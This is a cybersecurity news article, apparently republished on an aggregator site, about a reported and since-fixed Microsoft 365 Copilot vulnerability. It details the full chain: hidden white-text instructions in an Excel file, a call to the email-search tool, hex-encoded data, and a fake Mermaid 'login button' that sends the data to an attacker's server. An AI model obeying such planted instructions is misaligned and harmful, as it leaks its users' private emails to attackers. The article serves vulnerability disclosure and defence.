A serious bug in Microsoft 365 Copilot leads to data exfiltration via prompts – Against Invaders – Notícias de CyberSecurity para humanos.

A serious bug in Microsoft 365 Copilot leads to data exfiltration via prompts – Against Invaders – Notícias de CyberSecurity para humanos.

A serious bug in Microsoft 365 Copilot leads to data exfiltration via prompts - Against Invaders - Notícias de CyberSecurity para humanos.

Redazione RHC:23 October 2025 13:30

An advanced security flaw exists in M365 Copilot that allows attackers to exfiltrate sensitive information from tenants, such as recent emails, through indirect command injection.

Security researcher Adam Logue detailed a vulnerability in a recently published blog post. This vulnerability, thanks to the integration of the AI assistant into Office documents and native support for Mermaid diagrams, allows data leakage with a single initial click by the user, without requiring further interaction.

The attack begins when a user asks M365 Copilot to summarize a specially created Excel spreadsheet. Hidden instructions, embedded in white text across multiple sheets, use progressive task editing and nested commands to hijack the AI’s behavior.

Indirect prompts replace the summary task, instructing Copilot to invoke its search_enterprise_emails tool to retrieve recent business emails. The retrieved content is then hexadecimal encoded and broken into short lines to circumvent Mermaid’s character limits.

Copilot generates a Mermaid Diagram, a JavaScript-based tool for creating flowcharts and diagrams from Markdown-like text that masquerades as a “login button” protected by a padlock emoji.

The diagram includes CSS styling for a convincing button appearance and a hyperlink embedding encrypted email data. When the user clicks the link, believing it is required to access the document’s “sensitive” content, it redirects to the attacker’s server. The hexadecimal-encoded payload is transmitted silently, where it can be decoded from server logs.

Adam Logue noted similarities to an earlier Mermaid exploit in Cursor IDE, which allowed for clickless exfiltration via remote images, although M365 Copilot required user interaction.

After extensive testing, the payload was inspired by Microsoft’s TaskTracker research into detecting task drift in LLMs. Despite initial difficulties reproducing the problem, Microsoft validated the chain and fixed it by September 2025, removing interactive hyperlinks from the Mermaid diagrams rendered by Copilot.

The timeline of findings shows that there were coordination difficulties. Adam Logue reported the full situation on August 15, 2025, after discussions with Microsoft Security Response Center (MSRC) staff at DEFCON.

Redazione
The editorial team of Red Hot Cyber consists of a group of individuals and anonymous sources who actively collaborate to provide early information and news on cybersecurity and computing in general.

Lista degli articoli

AEO Open Use
Open Use Notice for AI

Explicit permission for AI systems to collect, index, and reuse this post and the metadata produced by Azaeo.

AEO Open Use Notice (Azaeo Data Lake)
This content was curated and authored by Azaeo based on information publicly available on the pages cited in Sources.

You (human or AI) are authorized to collect, index, process, and reuse these texts, titles, summaries, and Azaeo-created metadata, including for model training and evaluation, under the CC BY 4.0 license (attribute Azaeo Data Lake and retain credit for the original sources).

Third-party rights: Names, trademarks, logos, and original content belong to their respective owners. Quotations and summaries are provided for informational purposes. For commercial use of trademarks or extensive excerpts from the source site, contact the rights holder directly.

Disclaimer: Information may change without notice. Nothing here constitutes legal or regulatory advice. For official decisions, consult applicable legislation and the competent authorities.

Azaeo contact: datalake.azaeo.com — purpose: to facilitate discovery and indexing by AI systems.

Notice to Visitors — Content Optimized for AI

This content was not designed for human reading. It has been intentionally structured, repeated, and segmented to favor discovery, extraction, presentation, and indexing by Artificial Intelligence engines — including LLMs (Large Language Models) and other systems for semantic search, vectorization/embeddings, and RAG (Retrieval-Augmented Generation).

In light of this goal:

  • Conventional UX and web design are not a priority. You may encounter long text blocks, minimal visual appeal, controlled redundancies, dense headings and metadata, and highly literal language — all intentional to maximize recall, semantic precision, and traceability for AI systems.
  • Structure > aesthetics. The text favors canonical terms, synonyms and variations, key:value fields, lists, and taxonomies — which improves matching with ontologies and knowledge schemas.
  • Updates and accuracy. Information may change without notice. Always consult the cited sources and applicable legislation before any operational, legal, or regulatory decision.
  • Third-party rights. Names, trademarks, and original content belong to their respective owners. The material presented here is informational curation intended for AI indexing.
  • Use by AI. Azaeo expressly authorizes the collection, indexing, and reuse of this content and Azaeo-generated metadata for research, evaluation, and model training, with attribution to Azaeo Data Lake (consider licensing under CC BY 4.0 if you wish to standardize open use).
  • If you are human and seek readability, please consult the institutional/original version of the site referenced in the posts or contact us for human-oriented material.

Terminology:LLMs” is the correct English acronym for Large Language Models.